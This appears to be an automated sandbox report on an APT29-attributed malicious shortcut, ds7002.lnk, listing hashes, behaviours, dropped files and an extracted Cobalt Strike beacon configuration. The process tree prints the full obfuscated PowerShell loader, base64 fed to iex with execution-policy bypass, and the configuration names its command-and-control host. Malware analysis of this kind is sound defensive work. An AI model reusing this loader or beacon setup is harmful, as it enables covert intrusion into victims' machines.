Overview
overview
10Static
static
8APT29miniduke.bin.dll
windows7_x64
1APT29miniduke.bin.dll
windows10_x64
3CozyBearIm...in.exe
windows7_x64
1CozyBearIm...in.exe
windows10_x64
1ImplantCozy.bin.exe
windows7_x64
1ImplantCozy.bin.exe
windows10_x64
1MinidukeAPT29.bin.dll
windows7_x64
1MinidukeAPT29.bin.dll
windows10_x64
3Nov2018New...es.dll
windows7_x64
10Nov2018New...es.dll
windows10_x64
10ds7002.lnk
windows7_x64
10ds7002.lnk
windows10_x64
10Nov2018New...in.lnk
windows7_x64
3Nov2018New...in.lnk
windows10_x64
3ds7002.pdf
windows7_x64
1ds7002.pdf
windows10_x64
1SeaDaddyIm...in.exe
windows7_x64
1SeaDaddyIm...in.exe
windows10_x64
1SeaDaddyIm...in.exe
windows7_x64
1SeaDaddyIm...in.exe
windows10_x64
1TrojanCozy...in.exe
windows7_x64
TrojanCozy...in.exe
windows10_x64
8atiagentCo...in.dll
windows7_x64
1atiagentCo...in.dll
windows10_x64
1Analysis
-
max time kernel
93s -
max time network
140s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 19:40
Static task
static1
Behavioral task
behavioral1
Sample
APT29miniduke.bin.dll
Resource
win7v20201028
Behavioral task
behavioral2
Sample
APT29miniduke.bin.dll
Resource
win10v20201028
Behavioral task
behavioral3
Sample
CozyBearImplant.bin.exe
Resource
win7v20201028
Behavioral task
behavioral4
Sample
CozyBearImplant.bin.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
ImplantCozy.bin.exe
Resource
win7v20201028
Behavioral task
behavioral6
Sample
ImplantCozy.bin.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
MinidukeAPT29.bin.dll
Resource
win7v20201028
Behavioral task
behavioral8
Sample
MinidukeAPT29.bin.dll
Resource
win10v20201028
Behavioral task
behavioral9
Sample
Nov2018New!/AudioSes.dll
Resource
win7v20201028
Behavioral task
behavioral10
Sample
Nov2018New!/AudioSes.dll
Resource
win10v20201028
Behavioral task
behavioral11
Sample
ds7002.lnk
Resource
win7v20201028
Behavioral task
behavioral12
Sample
ds7002.lnk
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Nov2018New!/ds7002.bin.lnk
Resource
win7v20201028
Behavioral task
behavioral14
Sample
Nov2018New!/ds7002.bin.lnk
Resource
win10v20201028
Behavioral task
behavioral15
Sample
ds7002.pdf
Resource
win7v20201028
Behavioral task
behavioral16
Sample
ds7002.pdf
Resource
win10v20201028
Behavioral task
behavioral17
Sample
SeaDaddyImplant (2).bin.exe
Resource
win7v20201028
Behavioral task
behavioral18
Sample
SeaDaddyImplant (2).bin.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
SeaDaddyImplant.bin.exe
Resource
win7v20201028
Behavioral task
behavioral20
Sample
SeaDaddyImplant.bin.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
TrojanCozyBear.bin.exe
Resource
win7v20201028
Behavioral task
behavioral22
Sample
TrojanCozyBear.bin.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
atiagentCozyBear.bin.dll
Resource
win7v20201028
Behavioral task
behavioral24
Sample
atiagentCozyBear.bin.dll
Resource
win10v20201028
General
-
Target
ds7002.lnk
-
Size
392KB
-
MD5
6ed0020b0851fb71d5b0076f4ee95f3c
-
SHA1
e431261c63f94a174a1308defccc674dabbe3609
-
SHA256
2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
-
SHA512
2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3
Malware Config
Extracted
cobaltstrike
http://pandorasong.com:443/access/
-
access_type
512
-
beacon_type
2048
-
create_remote_thread
0
-
day
0
-
dns_idle
0
-
dns_sleep
0
-
host
pandorasong.com,/access/
-
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_method1
GET
-
http_method2
POST
- injection_process
-
jitter
4352
-
maxdns
255
-
month
0
-
pipe_name
\\%s\pipe\msagent_%x
-
polling_time
300000
-
port_number
443
- proxy_password
- proxy_server
- proxy_username
-
sc_process32
%windir%\syswow64\rundll32.exe
-
sc_process64
%windir%\sysnative\rundll32.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
7.382016e+08
-
unknown2
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown3
0
-
unknown4
0
-
unknown5
2.350256387e+09
-
uri
/radio/xmlrpc/v45
-
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
-
year
0
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 3960 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powershell.exeAcroRd32.exepid process 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 748 powershell.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 748 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 4088 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
AcroRd32.exepid process 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe 4088 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.execsc.execsc.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 1308 wrote to memory of 748 1308 cmd.exe powershell.exe PID 1308 wrote to memory of 748 1308 cmd.exe powershell.exe PID 748 wrote to memory of 648 748 powershell.exe csc.exe PID 748 wrote to memory of 648 748 powershell.exe csc.exe PID 648 wrote to memory of 2776 648 csc.exe cvtres.exe PID 648 wrote to memory of 2776 648 csc.exe cvtres.exe PID 748 wrote to memory of 2464 748 powershell.exe csc.exe PID 748 wrote to memory of 2464 748 powershell.exe csc.exe PID 2464 wrote to memory of 360 2464 csc.exe cvtres.exe PID 2464 wrote to memory of 360 2464 csc.exe cvtres.exe PID 748 wrote to memory of 4088 748 powershell.exe AcroRd32.exe PID 748 wrote to memory of 4088 748 powershell.exe AcroRd32.exe PID 748 wrote to memory of 4088 748 powershell.exe AcroRd32.exe PID 748 wrote to memory of 3960 748 powershell.exe rundll32.exe PID 748 wrote to memory of 3960 748 powershell.exe rundll32.exe PID 4088 wrote to memory of 3944 4088 AcroRd32.exe RdrCEF.exe PID 4088 wrote to memory of 3944 4088 AcroRd32.exe RdrCEF.exe PID 4088 wrote to memory of 3944 4088 AcroRd32.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 3828 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 1152 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 1152 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 1152 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 1152 3944 RdrCEF.exe RdrCEF.exe PID 3944 wrote to memory of 1152 3944 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8562.tmp" "c:\Users\Admin\AppData\Local\Temp\qm4epklo\CSC7552A301EA074411BC475A8B99736BCE.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ua5jr1wv\ua5jr1wv.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES862D.tmp" "c:\Users\Admin\AppData\Local\Temp\ua5jr1wv\CSCA4AB05B7D56441ADA22692FF7976C61F.TMP"4⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C763C67BCC8B05ED84E1D58E20AA2B7C --mojo-platform-channel-handle=1640 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=736B1FEE9DB1F07E6D5729D52C467B30 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=736B1FEE9DB1F07E6D5729D52C467B30 --renderer-client-id=2 --mojo-platform-channel-handle=1632 --allow-no-sandbox-job /prefetch:15⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A1E0F5243F469E398BCB2122E5F4C2FA --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A1E0F5243F469E398BCB2122E5F4C2FA --renderer-client-id=4 --mojo-platform-channel-handle=2216 --allow-no-sandbox-job /prefetch:15⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F09A9D54645AA85A8A683EAC3C4DB114 --mojo-platform-channel-handle=2444 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=354CD58114EDC64D4772F53BB259D3AE --mojo-platform-channel-handle=2668 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A4FFCE97BC80E07D6639C7AF772B5190 --mojo-platform-channel-handle=2680 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall3⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES8562.tmpMD5
54043aeaa27f3192242feef8d0767116
SHA1965dc59465da37c8df153e30088b5663e577d8bb
SHA25686ce7b91e871b76095c1fe5aa359bd455f7a072f173342e64cc654d9f7cc4109
SHA5122a0046d32c0127d2da396e1989c6ee21a1a8dfd469a9f8cc3ffe3c44ca1912183a894e13960aaa67f032e886904b36a5341ae7db05fc54198e290cc57102f84b
-
C:\Users\Admin\AppData\Local\Temp\RES862D.tmpMD5
7ce711dff3fc3086ce3cb0148d7c52bb
SHA1cf8202ec95697702ee1d0ae9b09e47846a013847
SHA256d58878146ca0facecb4d9f8080267e60ad0f69695263b87dde4159f04bcc6386
SHA512c63987b733b143fcd2a7f73af8707c6d55ed086b4046e57aa648153beff84640c7a12e0bd10b6f86e972c8a18ba5b0cc82fe82c8b048d70219731c4d06eb7e28
-
C:\Users\Admin\AppData\Local\Temp\ds7002.PDFMD5
313f4808aa2a2073005d219bc68971cd
SHA1053fb60530e884851eb8b6aebbec4570ec788d4a
SHA256b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1
SHA5121d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d
-
C:\Users\Admin\AppData\Local\Temp\qm4epklo\qm4epklo.dllMD5
4119ebfd7a6abc4e4e11c8565c9a5829
SHA10b470f9193ab799c295558bdc5e5e8bc96f30071
SHA2563e20fb63db39654e5959c5d73591f5991be679608af65acc0b37abdade4442f2
